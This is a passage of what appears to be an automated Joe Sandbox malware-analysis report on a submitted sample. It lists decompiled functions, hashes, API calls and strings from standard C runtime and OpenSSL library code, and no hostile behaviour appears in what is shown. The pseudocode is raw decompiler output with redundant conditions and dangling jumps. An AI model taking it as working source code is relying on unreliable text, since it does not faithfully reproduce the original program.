Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Mem_$Capsule_Err_FreeMallocMemory
String ID: unicodedata._ucnhash_CAPI
API String ID: 3673501854-3989975041
Opcode ID: d423d1ca27b1cd8aa76e999a0690d59a939e6550e8d77c515964588a0c26f32e
Instruction ID: 78d58d6232735c53ca2eeec303bf89e1fa06cc79797e5a36bfbd5077a0c13697
Opcode Fuzzy Hash: d423d1ca27b1cd8aa76e999a0690d59a939e6550e8d77c515964588a0c26f32e
Instruction Fuzzy Hash: 98F0C225A19F5AD5EB079B11A4641B9A2A5BF4A783F441433CD6D0A3D9FF2CE054C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E8830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7DA8E8855
GetProcAddress.KERNEL32 ref: 00007FF7DA8E886B
FreeLibrary.KERNEL32 ref: 00007FF7DA8E8892

Strings

mscoree.dll, xrefs: 00007FF7DA8E884C
CorExitProcess, xrefs: 00007FF7DA8E8864

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 43ec2fa5b206ef50a85d8791d4c505ac4782749c279514a83b9864bfeb17bd1e
Instruction ID: f6fbaa43aff5438410b0abd656ae3bf7d6a4ef96f7d0dc9f7f198edc6e562dd9
Opcode Fuzzy Hash: 43ec2fa5b206ef50a85d8791d4c505ac4782749c279514a83b9864bfeb17bd1e
Instruction Fuzzy Hash: AEF0AF61A0960381FA15AB24E84433DE360BF997A5FD40676CE7E462E5CF2CD568C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD861762 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 203COMMON

Download Yara Rule

Strings

..\s\crypto\rsa\rsa_sign.c, xrefs: 00007FFCFDA3F8CD, 00007FFCFDA3F900, 00007FFCFDA3F917, 00007FFCFDA3F98B, 00007FFCFDA3F9E5, 00007FFCFDA3FB6A, 00007FFCFDA3FB87
$, xrefs: 00007FFCFDA3F9D3

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID: $$..\s\crypto\rsa\rsa_sign.c
API String ID: 0-1864662394
Opcode ID: b1e35b43adc65caca2e36ede9ea3d59f5487deb23ee417c7bcc11d43d801b987
Instruction ID: ba075ac9c00a59f0bfc3f3e177047bd6a4a06001a1f6d0d821a2acce6be46ca6
Opcode Fuzzy Hash: b1e35b43adc65caca2e36ede9ea3d59f5487deb23ee417c7bcc11d43d801b987
Instruction Fuzzy Hash: C591E361E2C6AA8AE7609F21D46037DE291FB44784F504231EAAD07BC5EF3DE944C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD861ED3 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFCFDA12E71

Strings

..\s\crypto\pem\pem_lib.c, xrefs: 00007FFCFDA12EBA, 00007FFCFDA12F23, 00007FFCFDA1300C
;, xrefs: 00007FFCFDA12EB2
Enter PEM pass phrase:, xrefs: 00007FFCFDA12E87

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: memmove
String ID: ..\s\crypto\pem\pem_lib.c$;$Enter PEM pass phrase:
API String ID: 2162964266-3733131234
Opcode ID: cd38e328b997667744c1706e487c666578dc2542a510621b81c4d5bbb33f039a
Instruction ID: ca9affc35de63ed641856b318e5ffdcf1b61a10a935c0c401eacc59843b8ba0b
Opcode Fuzzy Hash: cd38e328b997667744c1706e487c666578dc2542a510621b81c4d5bbb33f039a
Instruction Fuzzy Hash: 0871F4626186AA86E720DF11D4617AAF3A0FB84794F410135EB6D47BC9EF3CD805CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F86F4 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FF77FF7DA8F86F4(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0xda8f8726;
				if (sil >= 0) goto 0xda8f8726;
				E00007FF77FF7DA8F8E8C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0xda8f877d;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0xda8f8741;
				asm("dec eax");
				if (_t42 >= 0) goto 0xda8f8741;
				E00007FF77FF7DA8F8E8C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0xda8f877d;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0xda8f875d;
				asm("dec eax");
				if (_t43 >= 0) goto 0xda8f875d;
				E00007FF77FF7DA8F8E8C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0xda8f877d;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0xda8f877d;
				asm("dec eax");
				if (_t44 >= 0) goto 0xda8f877d;
				if ((dil & 0x00000010) == 0) goto 0xda8f877a;
				E00007FF77FF7DA8F8E8C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0xda8f8797;
				asm("dec eax");
				if (_t46 >= 0) goto 0xda8f8797;
				E00007FF77FF7DA8F8E8C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

APIs

_set_statfp.LIBCMT ref: 00007FF7DA8F871C
_set_statfp.LIBCMT ref: 00007FF7DA8F8737
_set_statfp.LIBCMT ref: 00007FF7DA8F8753
_set_statfp.LIBCMT ref: 00007FF7DA8F878F

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
Instruction ID: 535853d5476a1173e797268cb5d8e5569c343a55e212608709a48fde3b9477d3
Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
Instruction Fuzzy Hash: 7D119126EDCA0341F7563224E44637D94407F793B4FD806F6FE6E062EB8E2CA8618230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA7B0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA7CF
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA7EE
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA816
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA827
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA838

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 703443d4120832b5791d71500607073e9e9a48874bfbc00edefa7c425f0c0b60
Instruction ID: aa84316d70e78753de3408a44298c12f1b4f23709343bddb3da6ecd87387da8e
Opcode Fuzzy Hash: 703443d4120832b5791d71500607073e9e9a48874bfbc00edefa7c425f0c0b60
Instruction Fuzzy Hash: F6119D60F08342C1FA5AB721558117DE2417F60BB0FC447B6ED3D467C7DE2EE6628220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA644 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA655
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA674
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA69C
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA6AD
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA6BE

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ce8fb8d2ec258449f1d7ec7fb260da50f1e1c13e24c64aca21b204daaccf0404
Instruction ID: 863c26ec0eca70e2182ff8186fc4a82a5862c8f3c797f2de9afe29225a91efcb
Opcode Fuzzy Hash: ce8fb8d2ec258449f1d7ec7fb260da50f1e1c13e24c64aca21b204daaccf0404
Instruction Fuzzy Hash: 611136A0E08203C1F96AB621445117DE2417F72BB4EC54BB6ED3E4A2E3DD2EF6608231

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EF0E8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00007FF77FF7DA8EF0E8(long long __rbx, signed int* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				signed int _t31;
				signed int _t33;
				signed int _t36;
				signed int _t49;
				signed int _t56;
				void* _t61;
				void* _t83;
				signed int _t89;
				void* _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t129;
				signed short* _t131;
				signed short* _t132;
				long long _t136;
				signed int _t138;
				signed short* _t142;
				signed short* _t143;
				void* _t144;

				_t109 = _t138;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = _t136;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				 *__rcx = _t109;
				__rcx[2] = 0;
				r14d = 0x20;
				_t31 =  *0xda91c9dc; // 0x0
				__rcx[1] = _t31;
				goto 0xda8ef12b;
				_t142 = __rdx + 2;
				_t33 =  *_t142 & 0x0000ffff;
				if (_t33 == r14w) goto 0xda8ef123;
				if (_t33 == 0x61) goto 0xda8ef158;
				if (_t33 == 0x72) goto 0xda8ef14f;
				if (_t33 != 0x77) goto 0xda8ef3bc;
				 *__rcx = 0x301;
				goto 0xda8ef15e;
				__rcx[1] = 1;
				goto 0xda8ef165;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t143 =  &(_t142[1]);
				r9b = bpl;
				dil = bpl;
				r10b = bpl;
				r11b = bpl;
				_t9 = _t136 + 0xa; // 0xa
				if ( *_t143 == 0) goto 0xda8ef2ce;
				_t56 =  *_t143 & 0x0000ffff;
				_t83 = _t56 - 0x53;
				if (_t83 > 0) goto 0xda8ef238;
				if (_t83 == 0) goto 0xda8ef221;
				if (_t83 == 0) goto 0xda8ef2b9;
				if (_t83 == 0) goto 0xda8ef1ef;
				if (_t83 == 0) goto 0xda8ef1e7;
				if (_t83 == 0) goto 0xda8ef1d5;
				_t61 = _t56 - r14d - 0xfffffffffffffff2 - _t9;
				if (_t83 == 0) goto 0xda8ef1cc;
				if (_t61 != 4) goto 0xda8ef3bc;
				if (r10b != 0) goto 0xda8ef2ac;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0xda8ef22d;
				asm("bts dword [ebx], 0x7");
				goto 0xda8ef2b7;
				if (( *__rcx & 0x00000040) != 0) goto 0xda8ef2ac;
				goto 0xda8ef2b5;
				r11b = 1;
				goto 0xda8ef2ac;
				if (dil != 0) goto 0xda8ef2ac;
				_t36 =  *__rcx;
				dil = 1;
				if ((_t36 & 0x00000002) != 0) goto 0xda8ef2ac;
				 *__rcx = _t36 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0xda8ef2b9;
				_t89 = r10b;
				if (_t89 != 0) goto 0xda8ef2ac;
				 *__rcx =  *__rcx | r14d;
				r10b = 1;
				goto 0xda8ef2b9;
				if (_t89 == 0) goto 0xda8ef2a4;
				if (_t89 == 0) goto 0xda8ef295;
				if (_t89 == 0) goto 0xda8ef283;
				if (_t89 == 0) goto 0xda8ef277;
				if (_t89 == 0) goto 0xda8ef268;
				_t90 = _t61 - 0x34 - 4;
				if (_t90 != 0) goto 0xda8ef3bc;
				asm("bt eax, 0x9");
				if (_t90 >= 0) goto 0xda8ef2ac;
				asm("bts eax, 0xa");
				goto 0xda8ef2b5;
				if (( *__rcx & 0x0000c000) != 0) goto 0xda8ef2ac;
				asm("bts eax, 0xe");
				goto 0xda8ef2b5;
				if (r9b != 0) goto 0xda8ef2ac;
				asm("btr dword [ebx+0x4], 0xb");
				goto 0xda8ef28d;
				if (r9b != 0) goto 0xda8ef2ac;
				asm("bts dword [ebx+0x4], 0xb");
				r9b = 1;
				goto 0xda8ef2b9;
				_t94 =  *__rcx & 0x0000c000;
				if (_t94 != 0) goto 0xda8ef2ac;
				asm("bts eax, 0xf");
				goto 0xda8ef2b5;
				asm("bt eax, 0xc");
				if (_t94 >= 0) goto 0xda8ef2b1;
				goto 0xda8ef2b9;
				asm("bts eax, 0xc");
				asm("dec eax");
				_t144 = _t143 + __rcx;
				if (1 != 0) goto 0xda8ef17c;
				_t128 =  ==  ? _t144 : _t144 + 2;
				goto 0xda8ef2df;
				_t129 = ( ==  ? _t144 : _t144 + 2) + 2;
				if ( *_t129 == r14w) goto 0xda8ef2db;
				if (r11b != 0) goto 0xda8ef2fc;
				if ( *_t129 != 0) goto 0xda8ef3bc;
				__rcx[2] = 1;
				goto 0xda8ef3cc;
				r8d = 3;
				if (E00007FF77FF7DA8E9950(_t144) != 0) goto 0xda8ef3bc;
				goto 0xda8ef323;
				_t131 = _t129 + 8;
				_t49 =  *_t131 & 0x0000ffff;
				if (_t49 == r14w) goto 0xda8ef31f;
				if (_t49 != 0x3d) goto 0xda8ef3bc;
				_t132 =  &(_t131[1]);
				if ( *_t132 == r14w) goto 0xda8ef336;
				r8d = 5;
				if (E00007FF77FF7DA8F53C4(_t109, _t132) != 0) goto 0xda8ef35f;
				asm("bts dword [ebx], 0x12");
				goto 0xda8ef3a1;
				r8d = 8;
				if (E00007FF77FF7DA8F53C4(_t109, _t132) != 0) goto 0xda8ef381;
				asm("bts dword [ebx], 0x11");
				goto 0xda8ef3a1;
				r8d = 7;
				if (E00007FF77FF7DA8F53C4(_t109, _t132) != 0) goto 0xda8ef3bc;
				asm("bts dword [ebx], 0x10");
				goto 0xda8ef3ab;
				if (( *(_t132 + __rsi + 2) & 0x0000ffff) == r14w) goto 0xda8ef3a7;
				goto 0xda8ef2ed;
				E00007FF77FF7DA8E4394(_t109);
				 *_t109 = 0x16;
				return E00007FF77FF7DA8E9D00();
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EF3C7

Part of subcall function 00007FF7DA8F53C4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F53E1

Strings

ccs, xrefs: 00007FF7DA8EF302
UTF-8, xrefs: 00007FF7DA8EF346
UTF-16LEUNICODE, xrefs: 00007FF7DA8EF365

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: abbf5a816cf9790d87ba27718c5909264acedcf573467f627084beda8466296f
Instruction ID: cd5cba1d9fa43e235ed0e76f0020f230da25ac1a3bad6b98b0dcd543ff5feb44
Opcode Fuzzy Hash: abbf5a816cf9790d87ba27718c5909264acedcf573467f627084beda8466296f
Instruction Fuzzy Hash: 4981A436D0A643C5F6676E25C11027DB690BB31B48FD580B7CE0D97287DB2EEE219721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DE068 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7DA8DE068(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0xda8de10c;
				E00007FF77FF7DA8DCC80(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0xda8de127;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00007FF77FF7DA8DCC80(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0xda8de127;
				if ( *__rcx == 0xe0434f4d) goto 0xda8de127;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0xda8de12b;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00007FF77FF7DA8DD128(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0xda8de12b;
				return _t19;
			}

APIs

EncodePointer.KERNEL32 ref: 00007FF7DA8DE0B4
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7DA8DE103

Strings

MOC, xrefs: 00007FF7DA8DE0C8
RCC, xrefs: 00007FF7DA8DE0D1

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 7d592ac69212e988a1052134f2f1a45de81130431c633717d475d5b1a3e6a8fe
Instruction ID: 6d0b9d1679c9eef083db72db7e68e5240d3715a5b69081efcb1fad2ef9e424ea
Opcode Fuzzy Hash: 7d592ac69212e988a1052134f2f1a45de81130431c633717d475d5b1a3e6a8fe
Instruction Fuzzy Hash: 46615D33A09B458AFB119F65D4803ADB7A0FB44B88F884266EF4D17B96DB3CE165C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD862833 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

..\s\crypto\async\async.c, xrefs: 00007FFCFD9230DF, 00007FFCFD92312D, 00007FFCFD923146, 00007FFCFD92317C, 00007FFCFD9231C6, 00007FFCFD92321C, 00007FFCFD92323D, 00007FFCFD92325B, 00007FFCFD923295, 00007FFCFD9232BA
T, xrefs: 00007FFCFD923253

Memory Dump Source

